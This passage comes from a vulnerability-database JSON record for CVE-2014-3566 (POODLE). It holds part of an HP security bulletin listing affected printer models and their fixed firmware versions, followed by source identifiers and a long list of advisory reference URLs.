CZ271A, CZ272A\n 20150112 (or higher)\n\nHP LaserJet Pro M521dn, dw MFP\n A8P79A, A8P80A\n 20150112 (or higher)\n\nHP Color LaserJet Pro MFP M476dn, dw, nw\n CF385A, CF386A, CF387A\n 20150112 (or higher)\n\nHP LaserJet Pro 400 MFP M425dn, dw\n CF286A, CF28A\n 20150112 (or higher)\n\nHP LaserJet Pro 200 color MFP M276n, nw\n CF144A, CF145A\n 20150112 (or higher)\n\nHP LaserJet Pro 400 M401a, d, dn, dne, dw, n\n CF270A, CF274A, CF278A, CF399A, CF285A, CZ195A\n 20150112 (or higher)\n\nHP LaserJet Pro P1566 Printer\n CE663A, CE749A\n 20150116 (or higher)\n\nHP LaserJet Pro 300 Color MFP M375nw\n CE903A\n 20150126 (or higher)\n\nHP LaserJet Pro 400 Color MFP M475dn, dw\n CE863A, CE864A\n 20150126 (or higher)\n\nHP TopShot LaserJet Pro M275 MFP\n CF040A\n 20150126 (or higher)\n\nHP LaserJet 300 color M351a\n CE955A\n 20150126 (or higher)\n\nHP LaserJet 400 color M451dn, dw, nw\n CE956A, CE957A, CE958A\n 20150126 (or higher)\n\nHP LaserJet Pro MFP M125a\n CZ172A\n 20150214 (or higher)\n\nHP LaserJet Pro MFP M126a\n CZ174A\n 20150215 (or higher)\n\nHP LaserJet Pro MFP M125nw\n CZ173A\n 20150228 (or higher)\n\nHP LaserJet Pro MFP M126nw\n CZ175A\n 20150228 (or higher)\n\nHP LaserJet Pro MFP M127fn, fw\n CZ181A, CZ183A\n 20150228 (or higher)\n\nHP LaserJet Pro MFP M128fn, fp, fw\n CZ184A, CZ185A, CZ186A\n 20150228 (or higher)\n\nHP Color LaserJet Pro MFP M176n, fw\n CF547A, CZ165A\n 20150228 (or higher)\n\nHP LaserJet Pro P1102, w\n CE651A, CE657A\n 20150313 (or higher)\n\nHP LaserJet Pro P1106\n CE653A\n 20150313 (or higher)\n\nHP LaserJet Pro P1108\n CE655A\n 20150313 (or higher)\n\nLaserJet Pro M435nw MFP\n A3E42A\n 20150316 (or higher)\n\nHP LaserJet Pro M701a, n\n B6S00A, B6S01A\n 20150316 (or higher)\n\nHP LaserJet Pro M706n\n B6S02A\n 20150316 (or higher)\n\nHP LaserJet Professional M1212nf MFP\n CE841A\n 20150405 (or higher)\n\nHP LaserJet Professional M1213nf MFP\n CE845A\n 20150405 (or higher)\n\nHP LaserJet Professional M1214nfh MFP\n CE843A\n 20150405 (or higher)\n\nHP LaserJet Professional M1216nfh MFP\n CE842A\n 20150405 (or higher)\n\nHP LaserJet Professional M1217nfw MFP\n CE844A\n 20150405 (or higher)\n\nHP HotSpot LaserJet Pro M1218nfs MFP\n B4K88A\n 20150405 (or higher)\n\nHP LaserJet Professional M1219nf MFP\n CE846A\n 20150405 (or higher)\n\nHP LaserJet Pro CP1025, nw\n CE913A, CE914A, CF346A, CF346A\n 20150413 (or higher)\n\nHP Officejet Pro X451dn Printer\n CN459A\n BNP1CN1502AR (or higher)\n\nHP Officejet Pro X451dw Printer\n CN463A\n BWP1CN1502AR (or higher)\n\nHP Officejet Pro X551dw Printer\n CV037A\n BZP1CN1502AR (or higher)\n\nHP Officejet Pro X476dn MFP\n CN460A\n LNP1CN1502BR (or higher)\n\nHP Officejet Pro X476dw MFP\n CN461A\n LWP1CN1502BR (or higher)\n\nHP Officejet Pro X576dw MFP\n CN598A\n LZP1CN1502BR (or higher)\n\nHP Officejet Pro 276dw MFP\n CR770A\n FRP1CN1517AR (or higher)\n\nHP Officejet Pro 8610/15/16 e-All-in-One Printer\n A7F64A, D7Z36A, J5T77A\n FDP1CN1502AR (or higher)\n\nHP Officejet Pro 8620/25 e-All-in-One Printer\n A7F65A, D7Z37A\n FDP1CN1502AR (or higher)\n\nHP Officejet Pro 8630 e-All-in-One Printer\n A7F66A\n FDP1CN1502AR (or higher)\n\nHP Jetdirect 620n EIO Card\n J7934G\n V29.26 (or higher)\n\nHP Jetdirect ew2500 802.11b/g Wireless Print Server\n J8021A\n V41.16 (or higher)\n\nHP Jetdirect 690n EIO Card\n J8007A\n V41.16 (or higher)\n\nHP Jetdirect 635n EIO Card\n J7961G\n V41.16 (or higher)\n\nHP Jetdirect 695n EIO Card\n J8024A\n V41.16 (or higher)\n\nHP Jetdirect 640n EIO Card\n J8025A\n V45.35 (or higher)\n\nHISTORY\nVersion:1 (rev.1) - 26 June 2015 Initial release\n\nThird Party Security Patches: Third party security patches that are to be\ninstalled on systems running HP software products should be applied in\naccordance with the customer\u0027s patch management policy. \n\nSupport: For issues about implementing the recommendations of this Security\nBulletin, contact normal HP Services support channel. For other issues about\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com. \n\nReport: To report a potential security vulnerability with any HP supported\nproduct, send Email to: security-alert@hp.com\n\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\nalerts via Email:\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\n\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\navailable here:\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\n\nSoftware Product Category: The Software Product Category is represented in\nthe title by the two characters following HPSB. \n\n3C = 3COM\n3P = 3rd Party Software\nGN = HP General Software\nHF = HP Hardware and Firmware\nMP = MPE/iX\nMU = Multi-Platform Software\nNS = NonStop Servers\nOV = OpenVMS\nPI = Printing and Imaging\nPV = ProCurve\nST = Storage Software\nTU = Tru64 UNIX\nUX = HP-UX\n\nCopyright 2015 Hewlett-Packard Development Company, L.P. \nHewlett-Packard Company shall not be liable for technical or editorial errors\nor omissions contained herein. The information provided is provided \"as is\"\nwithout warranty of any kind. To the extent permitted by law, neither HP or\nits affiliates, subcontractors or suppliers will be liable for\nincidental,special or consequential damages including downtime cost; lost\nprofits; damages relating to the procurement of substitute products or\nservices; or damages for loss of data, or software restoration. The\ninformation in this document is subject to change without notice. \nHewlett-Packard Company and the names of Hewlett-Packard products referenced\nherein are trademarks of Hewlett-Packard Company in the United States and\nother countries. Other product and company names mentioned herein may be\ntrademarks of their respective owners", "sources": [ { "db": "NVD", "id": "CVE-2014-3566" }, { "db": "VULHUB", "id": "VHN-71506" }, { "db": "PACKETSTORM", "id": "128732" }, { "db": "PACKETSTORM", "id": "129426" }, { "db": "PACKETSTORM", "id": "133368" }, { "db": "PACKETSTORM", "id": "130644" }, { "db": "PACKETSTORM", "id": "131011" }, { "db": "PACKETSTORM", "id": "130125" }, { "db": "PACKETSTORM", "id": "130334" }, { "db": "PACKETSTORM", "id": "130817" }, { "db": "PACKETSTORM", "id": "136577" }, { "db": "PACKETSTORM", "id": "129401" }, { "db": "PACKETSTORM", "id": "128808" }, { "db": "PACKETSTORM", "id": "132469" } ], "trust": 2.07 }, "exploit_availability": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "reference": "https://www.scap.org.cn/vuln/vhn-71506", "trust": 0.1, "type": "unknown" } ], "sources": [ { "db": "VULHUB", "id": "VHN-71506" } ] }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2014-3566", "trust": 2.3 }, { "db": "ICS CERT", "id": "ICSMA-18-058-02", "trust": 1.1 }, { "db": "SECUNIA", "id": "61130", "trust": 1.1 }, { "db": "SECUNIA", "id": "61995", "trust": 1.1 }, { "db": "SECUNIA", "id": "60792", "trust": 1.1 }, { "db": "SECUNIA", "id": "61019", "trust": 1.1 }, { "db": "SECUNIA", "id": "61316", "trust": 1.1 }, { "db": "SECUNIA", "id": "61827", "trust": 1.1 }, { "db": "SECUNIA", "id": "61782", "trust": 1.1 }, { "db": "SECUNIA", "id": "60056", "trust": 1.1 }, { "db": "SECUNIA", "id": "61810", "trust": 1.1 }, { "db": "SECUNIA", "id": "61819", "trust": 1.1 }, { "db": "SECUNIA", "id": "61825", "trust": 1.1 }, { "db": "SECUNIA", "id": "60206", "trust": 1.1 }, { "db": "SECUNIA", "id": "61303", "trust": 1.1 }, { "db": "SECUNIA", "id": "61359", "trust": 1.1 }, { "db": "SECUNIA", "id": "61345", "trust": 1.1 }, { "db": "SECUNIA", "id": "59627", "trust": 1.1 }, { "db": "SECUNIA", "id": "60859", "trust": 1.1 }, { "db": "SECUNIA", "id": "61926", "trust": 1.1 }, { "db": "SECTRACK", "id": "1031120", "trust": 1.1 }, { "db": "SECTRACK", "id": "1031106", "trust": 1.1 }, { "db": "SECTRACK", "id": "1031124", "trust": 1.1 }, { "db": "SECTRACK", "id": "1031091", "trust": 1.1 }, { "db": "SECTRACK", "id": "1031095", "trust": 1.1 }, { "db": "SECTRACK", "id": "1031088", "trust": 1.1 }, { "db": "SECTRACK", "id": "1031093", "trust": 1.1 }, { "db": "SECTRACK", "id": "1031105", "trust": 1.1 }, { "db": "SECTRACK", "id": "1031094", "trust": 1.1 }, { "db": "SECTRACK", "id": "1031087", "trust": 1.1 }, { "db": "SECTRACK", "id": "1031090", "trust": 1.1 }, { "db": "SECTRACK", "id": "1031107", "trust": 1.1 }, { "db": "SECTRACK", "id": "1031132", "trust": 1.1 }, { "db": "SECTRACK", "id": "1031085", "trust": 1.1 }, { "db": "SECTRACK", "id": "1031039", "trust": 1.1 }, { "db": "SECTRACK", "id": "1031096", "trust": 1.1 }, { "db": "SECTRACK", "id": "1031131", "trust": 1.1 }, { "db": "SECTRACK", "id": "1031029", "trust": 1.1 }, { "db": "SECTRACK", "id": "1031123", "trust": 1.1 }, { "db": "SECTRACK", "id": "1031086", "trust": 1.1 }, { "db": "SECTRACK", "id": "1031130", "trust": 1.1 }, { "db": "SECTRACK", "id": "1031092", "trust": 1.1 }, { "db": "SECTRACK", "id": "1031089", "trust": 1.1 }, { "db": "USCERT", "id": "TA14-290A", "trust": 1.1 }, { "db": "MCAFEE", "id": "SB10091", "trust": 1.1 }, { "db": "MCAFEE", "id": "SB10104", "trust": 1.1 }, { "db": "MCAFEE", "id": "SB10090", "trust": 1.1 }, { "db": "CERT/CC", "id": "VU#577193", "trust": 1.1 }, { "db": "JUNIPER", "id": "JSA10705", "trust": 1.1 }, { "db": "BID", "id": "70574", "trust": 1.1 }, { "db": "PACKETSTORM", "id": "132469", "trust": 0.2 }, { "db": "PACKETSTORM", "id": "131011", "trust": 0.2 }, { "db": "PACKETSTORM", "id": "130125", "trust": 0.2 }, { "db": "PACKETSTORM", "id": "128732", "trust": 0.2 }, { "db": "PACKETSTORM", "id": "136577", "trust": 0.2 }, { "db": "PACKETSTORM", "id": "129401", "trust": 0.2 }, { "db": "PACKETSTORM", "id": "130334", "trust": 0.2 }, { "db": "PACKETSTORM", "id": "133368", "trust": 0.2 }, { "db": "PACKETSTORM", "id": "130817", "trust": 0.2 }, { "db": "PACKETSTORM", "id": "129426", "trust": 0.2 }, { "db": "PACKETSTORM", "id": "131009", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "130184", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "131051", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "128838", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "130217", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "130296", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "129150", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "132084", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "132573", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "131354", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "128969", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "128669", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "128866", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "129265", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "129217", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "136599", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "133640", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "129263", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "128921", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "129614", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "130759", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "129065", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "139063", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "129266", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "128863", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "130332", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "128730", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "130298", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "131690", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "128770", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "132641", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "128733", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "130816", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "129528", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "130052", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "129294", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "132470", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "133836", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "129242", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "130304", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "130549", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "129427", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "130085", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "131008", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "137652", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "129071", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "130046", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "135908", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "130086", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "128769", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "130141", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "131535", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "130181", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "132942", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "130070", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "129318", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "132965", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "131790", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "130818", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "128771", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "130050", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "133600", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "130072", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "129120", "trust": 0.1 }, { "db": "CNNVD", "id": "CNNVD-201410-267", "trust": 0.1 }, { "db": "SEEBUG", "id": "SSVID-92692", "trust": 0.1 }, { "db": "VULHUB", "id": "VHN-71506", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "130644", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "128808", "trust": 0.1 } ], "sources": [ { "db": "VULHUB", "id": "VHN-71506" }, { "db": "PACKETSTORM", "id": "128732" }, { "db": "PACKETSTORM", "id": "129426" }, { "db": "PACKETSTORM", "id": "133368" }, { "db": "PACKETSTORM", "id": "130644" }, { "db": "PACKETSTORM", "id": "131011" }, { "db": "PACKETSTORM", "id": "130125" }, { "db": "PACKETSTORM", "id": "130334" }, { "db": "PACKETSTORM", "id": "130817" }, { "db": "PACKETSTORM", "id": "136577" }, { "db": "PACKETSTORM", "id": "129401" }, { "db": "PACKETSTORM", "id": "128808" }, { "db": "PACKETSTORM", "id": "132469" }, { "db": "NVD", "id": "CVE-2014-3566" } ] }, "id": "VAR-201410-1418", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VULHUB", "id": "VHN-71506" } ], "trust": 0.01 }, "last_update_date": "2024-07-23T20:21:29.859000Z", "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-310", "trust": 1.1 } ], "sources": [ { "db": "VULHUB", "id": "VHN-71506" }, { "db": "NVD", "id": "CVE-2014-3566" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 1.2, "url": "http://www.ubuntu.com/usn/usn-2486-1" }, { "trust": 1.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3566" }, { "trust": 1.1, "url": "http://www.securitytracker.com/id/1031029" }, { "trust": 1.1, "url": "http://www.securitytracker.com/id/1031039" }, { "trust": 1.1, "url": "http://www.securitytracker.com/id/1031085" }, { "trust": 1.1, "url": "http://www.securitytracker.com/id/1031086" }, { "trust": 1.1, "url": "http://www.securitytracker.com/id/1031087" }, { "trust": 1.1, "url": "http://www.securitytracker.com/id/1031088" }, { "trust": 1.1, "url": "http://www.securitytracker.com/id/1031089" }, { "trust": 1.1, "url": "http://www.securitytracker.com/id/1031090" }, { "trust": 1.1, "url": "http://www.securitytracker.com/id/1031091" }, { "trust": 1.1, "url": "http://www.securitytracker.com/id/1031092" }, { "trust": 1.1, "url": "http://www.securitytracker.com/id/1031093" }, { "trust": 1.1, "url": "http://www.securitytracker.com/id/1031094" }, { "trust": 1.1, "url": "http://www.securitytracker.com/id/1031095" }, { "trust": 1.1, "url": "http://www.securitytracker.com/id/1031096" }, { "trust": 1.1, "url": "http://www.securitytracker.com/id/1031105" }, { "trust": 1.1, "url": "http://www.securitytracker.com/id/1031106" }, { "trust": 1.1, "url": "http://www.securitytracker.com/id/1031107" }, { "trust": 1.1, "url": "http://www.securitytracker.com/id/1031120" }, { "trust": 1.1, "url": "http://www.securitytracker.com/id/1031123" }, { "trust": 1.1, "url": "http://www.securitytracker.com/id/1031124" }, { "trust": 1.1, "url": "http://www.securitytracker.com/id/1031130" }, { "trust": 1.1, "url": "http://www.securitytracker.com/id/1031131" }, { "trust": 1.1, "url": "http://www.securitytracker.com/id/1031132" }, { "trust": 1.1, "url": "http://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20141015-poodle" }, { "trust": 1.1, "url": "http://secunia.com/advisories/59627" }, { "trust": 1.1, "url": "http://secunia.com/advisories/60056" }, { "trust": 1.1, "url": "http://secunia.com/advisories/60206" }, { "trust": 1.1, "url": "http://secunia.com/advisories/60792" }, { "trust": 1.1, "url": "http://secunia.com/advisories/60859" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61019" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61130" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61303" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61316" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61345" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61359" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61782" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61810" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61819" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61825" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61827" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61926" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61995" }, { "trust": 1.1, "url": "http://www.securityfocus.com/bid/70574" }, { "trust": 1.1, "url": "http://archives.neohapsis.com/archives/bugtraq/2014-10/0101.html" }, { "trust": 1.1, "url": "http://archives.neohapsis.com/archives/bugtraq/2014-10/0103.html" }, { "trust": 1.1, "url": "http://www.securityfocus.com/archive/1/533724/100/0/threaded" }, { "trust": 1.1, "url": "http://www.securityfocus.com/archive/1/533747" }, { "trust": 1.1, "url": "http://www.securityfocus.com/archive/1/533746" }, { "trust": 1.1, "url": "http://lists.apple.com/archives/security-announce/2015/jan/msg00003.html" }, { "trust": 1.1, "url": "http://lists.apple.com/archives/security-announce/2015/sep/msg00002.html" }, { "trust": 1.1, "url": "http://www.debian.org/security/2014/dsa-3053" }, { "trust": 1.1, "url": "http://www.debian.org/security/2015/dsa-3144" }, { "trust": 1.1, "url": "http://www.debian.org/security/2015/dsa-3147" }, { "trust": 1.1, "url": "http://www.debian.org/security/2015/dsa-3253" }, { "trust": 1.1, "url": "http://www.debian.org/security/2016/dsa-3489" }, { "trust": 1.1, "url": "http://lists.fedoraproject.org/pipermail/package-announce/2014-november/142330.html" }, { "trust": 1.1, "url": "http://lists.fedoraproject.org/pipermail/package-announce/2014-october/141158.html" }, { "trust": 1.1, "url": "http://lists.fedoraproject.org/pipermail/package-announce/2014-october/141114.html" }, { "trust": 1.1, "url": "http://lists.fedoraproject.org/pipermail/package-announce/2015-october/169374.html" }, { "trust": 1.1, "url": "http://lists.fedoraproject.org/pipermail/package-announce/2015-october/169361.html" }, { "trust": 1.1, "url": "https://security.gentoo.org/glsa/201507-14" }, { "trust": 1.1, "url": "https://security.gentoo.org/glsa/201606-11" }, { "trust": 1.1, "url": "http://h20564.www2.hp.com/hpsc/doc/public/display?docid=emr_na-c04583581" }, { "trust": 1.1, "url": "http://www.mandriva.com/security/advisories?name=mdvsa-2014:203" }, { "trust": 1.1, "url": "http://www.mandriva.com/security/advisories?name=mdvsa-2015:062" }, { "trust": 1.1, "url": "ftp://ftp.netbsd.org/pub/netbsd/security/advisories/netbsd-sa2014-015.txt.asc" }, { "trust": 1.1, "url": "http://rhn.redhat.com/errata/rhsa-2014-1652.html" }, { "trust": 1.1, "url": "http://rhn.redhat.com/errata/rhsa-2014-1653.html" }, { "trust": 1.1, "url": "http://rhn.redhat.com/errata/rhsa-2014-1692.html" }, { "trust": 1.1, "url": "http://rhn.redhat.com/errata/rhsa-2014-1876.html" }, { "trust": 1.1, "url": "http://rhn.redhat.com/errata/rhsa-2014-1877.html" }, { "trust": 1.1, "url": "http://rhn.redhat.com/errata/rhsa-2014-1880.html" }, { "trust": 1.1, "url": "http://rhn.redhat.com/errata/rhsa-2014-1881.html" }, { "trust": 1.1, "url": "http://rhn.redhat.com/errata/rhsa-2014-1882.html" }, { "trust": 1.1, "url": "http://rhn.redhat.com/errata/rhsa-2014-1920.html" }, { "trust": 1.1, "url": "http://rhn.redhat.com/errata/rhsa-2014-1948.html" }, { "trust": 1.1, "url": "http://rhn.redhat.com/errata/rhsa-2015-0068.html" }, { "trust": 1.1, "url": "http://rhn.redhat.com/errata/rhsa-2015-0079.html" }, { "trust": 1.1, "url": "http://rhn.redhat.com/errata/rhsa-2015-0080.html" }, { "trust": 1.1, "url": "http://rhn.redhat.com/errata/rhsa-2015-0085.html" }, { "trust": 1.1, "url": "http://rhn.redhat.com/errata/rhsa-2015-0086.html" }, { "trust": 1.1, "url": "http://rhn.redhat.com/errata/rhsa-2015-0264.html" }, { "trust": 1.1, "url": "http://rhn.redhat.com/errata/rhsa-2015-0698.html" }, { "trust": 1.1, "url": "http://rhn.redhat.com/errata/rhsa-2015-1545.html" }, { "trust": 1.1, "url": "http://rhn.redhat.com/errata/rhsa-2015-1546.html" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2014-11/msg00001.html" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2014-11/msg00003.html" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2014-11/msg00021.html" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2014-12/msg00002.html" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2015-02/msg00024.html" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2015-02/msg00026.html" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2015-02/msg00027.html" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2015-02/msg00033.html" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2015-02/msg00036.html" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2015-03/msg00018.html" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2015-03/msg00027.html" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00066.html" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-06/msg00000.html" }, { "trust": 1.1, "url": "http://www.us-cert.gov/ncas/alerts/ta14-290a" }, { "trust": 1.1, "url": "http://www.ubuntu.com/usn/usn-2487-1" }, { "trust": 1.1, "url": "http://www.kb.cert.org/vuls/id/577193" }, { "trust": 1.1, "url": "https://lists.apache.org/thread.html/rc774278135816e7afc943dc9fc78eb0764f2c84a2b96470a0187315c%40%3ccommits.cxf.apache.org%3e" }, { "trust": 1.1, "url": "https://lists.apache.org/thread.html/r36e44ffc1a9b365327df62cdfaabe85b9a5637de102cea07d79b2dbf%40%3ccommits.cxf.apache.org%3e" }, { "trust": 1.1, "url": "https://lists.apache.org/thread.html/rff42cfa5e7d75b7c1af0e37589140a8f1999e578a75738740b244bd4%40%3ccommits.cxf.apache.org%3e" }, { "trust": 1.1, "url": "https://lists.apache.org/thread.html/rd49aabd984ed540c8ff7916d4d79405f3fa311d2fdbcf9ed307839a6%40%3ccommits.cxf.apache.org%3e" }, { "trust": 1.1, "url": "https://lists.apache.org/thread.html/rec7160382badd3ef4ad017a22f64a266c7188b9ba71394f0d321e2d4%40%3ccommits.cxf.apache.org%3e" }, { "trust": 1.1, "url": "https://lists.apache.org/thread.html/rfb87e0bf3995e7d560afeed750fac9329ff5f1ad49da365129b7f89e%40%3ccommits.cxf.apache.org%3e" }, { "trust": 1.1, "url": "http://advisories.mageia.org/mgasa-2014-0416.html" }, { "trust": 1.1, "url": "http://aix.software.ibm.com/aix/efixes/security/openssl_advisory11.asc" }, { "trust": 1.1, "url": "http://askubuntu.com/questions/537196/how-do-i-patch-workaround-sslv3-poodle-vulnerability-cve-2014-3566" }, { "trust": 1.1, "url": "http://blog.cryptographyengineering.com/2014/10/attack-of-week-poodle.html" }, { "trust": 1.1, "url": "http://blog.nodejs.org/2014/10/23/node-v0-10-33-stable/" }, { "trust": 1.1, "url": "http://blogs.technet.com/b/msrc/archive/2014/10/14/security-advisory-3009008-released.aspx" }, { "trust": 1.1, "url": "http://docs.ipswitch.com/moveit/dmz82/releasenotes/moveitreleasenotes82.pdf" }, { "trust": 1.1, "url": "http://downloads.asterisk.org/pub/security/ast-2014-011.html" }, { "trust": 1.1, "url": "http://googleonlinesecurity.blogspot.com/2014/10/this-poodle-bites-exploiting-ssl-30.html" }, { "trust": 1.1, "url": "http://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c04779034" }, { "trust": 1.1, "url": "http://people.canonical.com/~ubuntu-security/cve/2014/cve-2014-3566.html" }, { "trust": 1.1, "url": "http://support.apple.com/ht204244" }, { "trust": 1.1, "url": "http://support.citrix.com/article/ctx200238" }, { "trust": 1.1, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1021431" }, { "trust": 1.1, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1021439" }, { "trust": 1.1, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21686997" }, { "trust": 1.1, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21687172" }, { "trust": 1.1, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21687611" }, { "trust": 1.1, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21688283" }, { "trust": 1.1, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21692299" }, { "trust": 1.1, "url": "http://www.oracle.com/technetwork/security-advisory/cpuapr2016v3-2985753.html" }, { "trust": 1.1, "url": "http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html" }, { "trust": 1.1, "url": "http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html" }, { "trust": 1.1, "url": "http://www.oracle.com/technetwork/topics/security/bulletinapr2015-2511959.html" }, { "trust": 1.1, "url": "http://www.oracle.com/technetwork/topics/security/bulletinapr2016-2952098.html" }, { "trust": 1.1, "url": "http://www.oracle.com/technetwork/topics/security/bulletinjan2015-2370101.html" }, { "trust": 1.1, "url": "http://www.oracle.com/technetwork/topics/security/bulletinjan2016-2867206.html" }, { "trust": 1.1, "url": "http://www.oracle.com/technetwork/topics/security/bulletinjul2015-2511963.html" }, { "trust": 1.1, "url": "http://www.oracle.com/technetwork/topics/security/bulletinoct2015-2511968.html" }, { "trust": 1.1, "url": "http://www.oracle.com/technetwork/topics/security/cpuapr2015-2365600.html" }, { "trust": 1.1, "url": "http://www.oracle.com/technetwork/topics/security/cpujan2015-1972971.html" }, { "trust": 1.1, "url": "http://www.oracle.com/technetwork/topics/security/cpujul2015-2367936.html" }, { "trust": 1.1, "url": "http://www.vmware.com/security/advisories/vmsa-2015-0003.html" }, { "trust": 1.1, "url": "http://www.websense.com/support/article/kbarticle/vulnerabilities-resolved-in-triton-apx-version-8-0" }, { "trust": 1.1, "url": 